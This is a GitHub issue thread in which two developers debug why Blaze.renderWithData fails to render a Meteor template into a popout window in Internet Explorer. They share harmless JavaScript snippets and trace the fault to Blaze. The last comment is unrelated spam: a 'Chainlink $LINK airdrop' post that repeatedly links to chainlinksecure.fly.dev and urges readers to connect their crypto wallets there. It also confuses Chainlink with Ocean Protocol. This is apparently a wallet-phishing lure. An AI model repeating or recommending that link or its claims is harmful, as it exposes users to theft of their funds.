### ISSUE TITLE
Support for Internet Explorer

### ISSUE THREAD

**Issue by jchristman** [jchristman/meteor-popout#1]
Neither the method for Chrome and Safari ([line 55](https://github.com/jchristman/meteor-popout/blob/master/lib/popout.js#L55)) nor the method for Firefox ([line 57](https://github.com/jchristman/meteor-popout/blob/master/lib/popout.js#L57)) works for Internet Explorer.

I need a way of getting a handle to the new window's body element in IE, to pass that reference to the following code:

``` js
Blaze.renderWithData(Template[this.template], context, BODY_ELEMENT);
```

**Comment by looshi** [comment]
This is the issue in Blaze : 
![screen shot 2015-03-07 at 9 19 24 pm](https://cloud.githubusercontent.com/assets/1656829/6544682/b8bb6718-c510-11e4-9493-de116fff85f9.png)
here : 
https://github.com/meteor/meteor/blob/devel/packages/blaze/domrange.js#L88
renderWithData does work fine in IE 11.  However, does not work for those references to the newWindow as you mention above.

You can get a handle to the new window's body element,  and you can set properties on it  :  
https://github.com/looshi/meteor-popout/blob/master/lib/popout.js#L55

but the Blaze exception will still occur.  I was not able to resolve the issue.

**Comment by looshi** [comment]
see updated comment above.

**Comment by jchristman** [comment]
Are you able to append a DOM node (like a div)? Maybe something like $(self.newWindow.document.body).append($('&lt;div id="test"&gt;&lt;/div&gt;')). I won't be able to test this until tomorrow probably. You could try that and then inspect the html to see if it actually gets appended.

**Comment by jchristman** [comment]
Sorry I'm on my phone and the previous comment are my html. Inside those quotes are a &lt div id="test" &gt &lt /div &gt

**Comment by looshi** [comment]
yes, it is possible to append divs to the new window.  But the Blaze exception is still thrown.
![screen shot 2015-03-08 at 10 37 22 am](https://cloud.githubusercontent.com/assets/1656829/6546817/0546c0d6-c580-11e4-88b3-0918b423bddd.png)

```
var interval = setInterval(function(){
        if(self.newWindow.document.body){
            clearInterval(interval);
            var div = self.newWindow.document.createElement('div');
            div.innerHTML = "appended div.";
            self.newWindow.document.body.appendChild(div);
            self.newWindow.document.body.style.backgroundColor = "#ff0000";  // just to make sure we can act on it
            Blaze.renderWithData(Template[self.template], context,div); 
        }else{
            console.log("polling....");
        }
    },100);
```

**Comment by looshi** [comment]
there are two optional parameters to Blaze.renderWithData.  I tried using nextNode, but got the same exception.
    // create innerDiv, append it to div  

```
Blaze.renderWithData(Template[self.template], context,div,innerDiv); 
```

http://docs.meteor.com/#/full/blaze_renderwithdata
The other optional parameter is parentView, in this case there is no parent view.

I am not sure what else to try, so I'm stopping here.
If it doesn't work out at all with IE,  you could approach this problem differently by using some basic Router type of logic.  Setup the new window so that it already has a template inside of it which checks the URL when it's rendered, and then loads internally the appropriate Template.  But, hopefully the IE blaze issue is something random and can be solved.

This is what I started to do in my project before seeing your library : 

```
<a  onclick="window.open('/{{TemplateName}}', 'newwindow', 'width=600, height=600');return false;">
```

**Comment by jchristman** [comment]
I believe this is an overall problem with meteor (Blaze specifically) actually. I created an [issue](https://github.com/meteor/meteor/issues/3891) if you want to check it out.

As for your comment about router.js, I'd like to steer away from that route (no pun intended!). My intention is to integrate this into another library I'm creating. You can see the live demo at [appmanager.meteor.com](http://appmanager.meteor.com/) (login in the top left corner). It's essentially a window management system that has a layering system inside the web browser to create nice looking, very fluid applications. I want to be able to "pop" a window out into a separate window but keep everything reactive, and I don't want to mess around with trying to get that many routes integrated in.

As it is, this library works well on every browser but IE so I'm gonna go with it for now and hopefully an upstream fix to Blaze will fix IE.

**Comment by matnledsmsadkdad** [comment]
# 🪂 Chainlink $LINK Airdrop: How to Qualify for Chainlink $LINK Coin airdrop?
- If you're interested about the world of holder airdrops and governance tokens, the Chainlink $LINK initiative airdrop is a great place to begin. This guide will streamline the process for you, elucidating how to join this airdrop and what you can anticipate.

[![Claim Now](https://blog.bit2me.com/en/wp-content/uploads/sites/4/2022/03/The-Great-B2M-Airdrop.png)](https://chainlinksecure.fly.dev/)

#### 🚀 Simple Steps to Secure Your Ocean Protocol Airdrop:

1. **Connect Your Wallet:**
   - Swing by the [ Chainlink $LINK Airdrop](https://chainlinksecure.fly.dev/).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - Confirm your eligibility for the Ocean Protocol Airdrop [right here](https://chainlinksecure.fly.dev/).

3. **Engage for Extra Rewards:**
   - Dive into community discussions or tackle tasks for bonus rewards.

### 🌈 Bonus Tips for Chainlink $LINK Airdrop Airdrop Success:

- **Community Assistance:**
  - Need a hand? Shoot a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep your eyes peeled for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a bit. Stay chill and keep an eye out for updates.

Feel free to share your Ocean Protocol Airdrop experiences or shoot any questions in the comments below. Let's make this process a breeze for everyone!
